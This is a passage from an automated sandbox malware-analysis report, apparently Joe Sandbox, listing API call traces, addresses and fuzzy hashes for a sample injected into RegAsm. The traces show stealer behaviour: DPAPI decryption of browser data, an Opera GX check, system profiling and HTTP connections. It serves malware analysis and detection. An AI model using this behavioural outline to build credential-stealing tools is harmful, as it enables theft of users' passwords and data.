                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164BF
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164D6
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 004164ED
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 00416504
                                                                                                                                                                                                  • Part of subcall function 004162F9: GetProcAddress.KERNEL32 ref: 0041651B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041623D,00425507), ref: 0040EBC6
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: HeapAlloc.KERNEL32(00000000,?,?,?,0041623D,00425507), ref: 0040EBCD
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetUserNameA.ADVAPI32(00000000,?), ref: 0040EBE1
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041629E
                                                                                                                                                                                                • Sleep.KERNEL32(00001B58), ref: 004162A9
                                                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00425A60,?,00000000,00425507), ref: 004162BA
                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004162D0
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004162DE
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004162E5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$wcslen$lstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologLibraryLoadNameOpenSleepUserlstrcatlstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2119032056-0
                                                                                                                                                                                                • Opcode ID: 07d8c05c405f0823ea941a26bfbe178101e3d604278b7344bc2b617775133b21
                                                                                                                                                                                                • Instruction ID: 3b746e891c5ee0c66c2a91cc43542382523336fa1075cbc9f29eedf77854c369
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07d8c05c405f0823ea941a26bfbe178101e3d604278b7344bc2b617775133b21
                                                                                                                                                                                                • Instruction Fuzzy Hash: BB115C71900418AACB01FBA3DD5ACEE777EAE55304B40087EF502B20D2DF385A15CAA9
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CrackH_prologInternetlstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 503950642-0
                                                                                                                                                                                                • Opcode ID: 9a5937afff5c11dea6ffe0ee86a216098c686409a9e8273c2abd2d22ddd4ed6c
                                                                                                                                                                                                • Instruction ID: 383eafd706f4d7733415b73dc21a4906bfce4d5d1e04002f424781588bab2e5d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a5937afff5c11dea6ffe0ee86a216098c686409a9e8273c2abd2d22ddd4ed6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8112E71D00208ABDB14EFA5D846BDE7F78AF15324F20822AE561B62D1DB385B45CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00406536
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00424B9C,?,?,?,00424B97,00000000), ref: 004065F3
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00424BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00424B9B), ref: 0040666B
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 00406686
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004065E7, 004065EC, 00406606
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                • API String ID: 757424748-3463377506
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062AE
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalAlloc.KERNEL32(00000040,EY@,?,?,00405945,00000000,?,?), ref: 004062BC
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062D2
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalFree.KERNEL32(00000000,?,?,00405945,00000000,?,?), ref: 004062E1
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                  • Part of subcall function 004062F1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406314
                                                                                                                                                                                                  • Part of subcall function 004062F1: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040632C
                                                                                                                                                                                                  • Part of subcall function 004062F1: LocalFree.KERNEL32(?), ref: 0040634A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                • String ID: $DPAPI
                                                                                                                                                                                                • API String ID: 2477620391-1819349886
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory), ref: 0040F6AC
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F6B3
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?), ref: 0040F6E1
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000), ref: 0040F6FD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID: Windows 11
                                                                                                                                                                                                • API String ID: 3676486918-2517555085
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000,?,Windows: ,00000000), ref: 0040EB53
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C), ref: 0040EB5A
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000,?,Windows: ), ref: 0040EB78
                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040EBB1,0040F6C0,?,?,?,00413A47,00000000), ref: 0040EB93
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                • String ID: CurrentBuildNumber
                                                                                                                                                                                                • API String ID: 3676486918-1022791448
                                                                                                                                                                                                • Opcode ID: b7a1cadd6af1d37ce2bb42d3d59b767d7a88e45211d7c1549b2bead73dd6883c
                                                                                                                                                                                                • Instruction ID: 5a1b8344219bb76cf6eb49664f8bd172239daab24317a4b126cc0b4746ce801e
                                                                                                                                                                                                • Opcode Fuzzy Hash: b7a1cadd6af1d37ce2bb42d3d59b767d7a88e45211d7c1549b2bead73dd6883c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F03075640215FBFB109BD1DC0BF6E7A7DEB45F04F201069F701A5091E6B46A109B24
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004159D0
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 00412424: _EH_prolog.MSVCRT ref: 00412429
                                                                                                                                                                                                  • Part of subcall function 004121C3: _EH_prolog.MSVCRT ref: 004121C8
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32(74DD0000,00415AF4), ref: 0041668A
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166A1
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166B8
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166CF
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166E6
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004166FD
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416714
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041672B
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416742
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416759
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416770
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416787
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041679E
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167B5
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167CC
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167E3
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 004167FA
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416811
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416828
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041683F
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416856
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041686D
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 00416884
                                                                                                                                                                                                  • Part of subcall function 00416676: GetProcAddress.KERNEL32 ref: 0041689B
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,00411C31,?,00425503,00000000,?,00000040,00000064,00412598,00411C31,?,0000002C,00000064), ref: 00415B9D
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0041283A: _EH_prolog.MSVCRT ref: 0041283F
                                                                                                                                                                                                  • Part of subcall function 004124D3: _EH_prolog.MSVCRT ref: 004124D8
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00415C82
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00415C9E
                                                                                                                                                                                                  • Part of subcall function 0040F52A: _EH_prolog.MSVCRT ref: 0040F52F
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F552
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F584
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F5C7
                                                                                                                                                                                                  • Part of subcall function 0040F52A: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F5CE
                                                                                                                                                                                                  • Part of subcall function 00403B17: _EH_prolog.MSVCRT ref: 00403B1C
                                                                                                                                                                                                  • Part of subcall function 00403B17: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BC7
                                                                                                                                                                                                  • Part of subcall function 00403B17: StrCmpCA.SHLWAPI(?), ref: 00403BDE
                                                                                                                                                                                                  • Part of subcall function 00410BF7: _EH_prolog.MSVCRT ref: 00410BFC
                                                                                                                                                                                                  • Part of subcall function 00410BF7: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415D19), ref: 00410C1E
                                                                                                                                                                                                  • Part of subcall function 00410BF7: ExitProcess.KERNEL32 ref: 00410C29
                                                                                                                                                                                                  • Part of subcall function 00405183: _EH_prolog.MSVCRT ref: 00405188
                                                                                                                                                                                                  • Part of subcall function 00405183: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405233
                                                                                                                                                                                                  • Part of subcall function 00405183: StrCmpCA.SHLWAPI(?), ref: 0040524A
                                                                                                                                                                                                  • Part of subcall function 004106E3: _EH_prolog.MSVCRT ref: 004106E8
                                                                                                                                                                                                  • Part of subcall function 004106E3: strtok_s.MSVCRT ref: 0041070F
                                                                                                                                                                                                  • Part of subcall function 004106E3: StrCmpCA.SHLWAPI(00000000,004254A8,?,?,?,?,00415EA8), ref: 00410740
                                                                                                                                                                                                  • Part of subcall function 004106E3: strtok_s.MSVCRT ref: 004107A1
                                                                                                                                                                                                  • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                                                                                                                                  • Part of subcall function 00405183: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053D2
                                                                                                                                                                                                  • Part of subcall function 00405183: HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405409
                                                                                                                                                                                                  • Part of subcall function 00411B93: _EH_prolog.MSVCRT ref: 00411B98
                                                                                                                                                                                                  • Part of subcall function 00411B93: strtok_s.MSVCRT ref: 00411BBF
                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00416057
                                                                                                                                                                                                  • Part of subcall function 00405183: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040542E
                                                                                                                                                                                                  • Part of subcall function 00411B93: strtok_s.MSVCRT ref: 00411BFF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$H_prolog$Internetlstrcpy$Open$strtok_s$DirectoryHeapProcesslstrcatlstrlen$AllocConnectCreateExitHttpInformationOptionRequestSleepSystemTimeVolumeWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4125082457-0
                                                                                                                                                                                                • Opcode ID: 738281476d5284411635911381d097a2b9744545c5ef9b347938e2c271a1d684
                                                                                                                                                                                                • Instruction ID: 481a4604d310252fad8a217da08601282fa68929c26b5bc73ce888e1270fc528
                                                                                                                                                                                                • Opcode Fuzzy Hash: 738281476d5284411635911381d097a2b9744545c5ef9b347938e2c271a1d684
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A3241B1D00258EADF10EBA5C946BDDBBB8AF15304F5045AFE44473281DB781B98CBA7
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402512
                                                                                                                                                                                                  • Part of subcall function 0040247E: memset.MSVCRT ref: 004024A3
                                                                                                                                                                                                  • Part of subcall function 0040247E: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024C9
                                                                                                                                                                                                  • Part of subcall function 0040247E: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E3
                                                                                                                                                                                                • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402527
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402532
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00402539
                                                                                                                                                                                                  • Part of subcall function 0040232A: ??_U@YAPAXI@Z.MSVCRT ref: 004023AF
                                                                                                                                                                                                • memset.MSVCRT ref: 00402562
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3248666761-0
                                                                                                                                                                                                • Opcode ID: 56d512cd650d7da32bd0f446be5566ee4961e3d79870d63763c05bef8aae14ff
                                                                                                                                                                                                • Instruction ID: 009d821118f090afdc25ade215e33f6b4a4e9640787576255bfffd64c02f4d4b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56d512cd650d7da32bd0f446be5566ee4961e3d79870d63763c05bef8aae14ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF044B6D45218B7CB10ABA4DD09FCE7B7C9F14304F4000A6B945F3091D9B897C48BA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040C745
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00424C1E,00424C1B,?,?,?), ref: 0040C78F
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040B20D: _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040B20D: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
